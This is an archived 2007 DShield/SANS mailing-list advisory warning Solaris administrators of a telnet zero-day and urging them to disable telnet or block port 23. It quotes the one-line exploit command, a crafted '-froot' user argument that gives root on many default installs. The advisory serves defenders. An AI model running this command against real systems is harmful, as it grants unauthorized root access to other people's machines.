[Dshield] Solaris Telnet 0-day (Important!)
Johannes B. Ullrich
jullrich at sans.org
Sun Feb 11 21:22:23 GMT 2007
If you run Solaris, please check if you got telnet enabled NOW. If you
can, block port 23 at your perimeter. There is a fairly trivial Solaris
telnet -l "-froot" [hostname]
will give you root on many Solaris systems with default installs
We are still testing. Please use our contact form at
if you have any details about the use of this exploit.
Johannes Ullrich http://isc.sans.org
SANS 2007 March 29 - April 6 in San Diego, CA offers 52 Courses
taught by our top rated instructors plus a huge vendor tools expo.
Register Today! <http://www.sans.org/info/2501>
PGP Key: https://secure.dshield.org/PGPKEYS
-------------- next part --------------
A non-text attachment was scrubbed...
Size: 249 bytes
Desc: OpenPGP digital signature
Url : http://lists.sans.org/pipermail/list/attachments/20070211/d8e01253/attachment.bin
More information about the list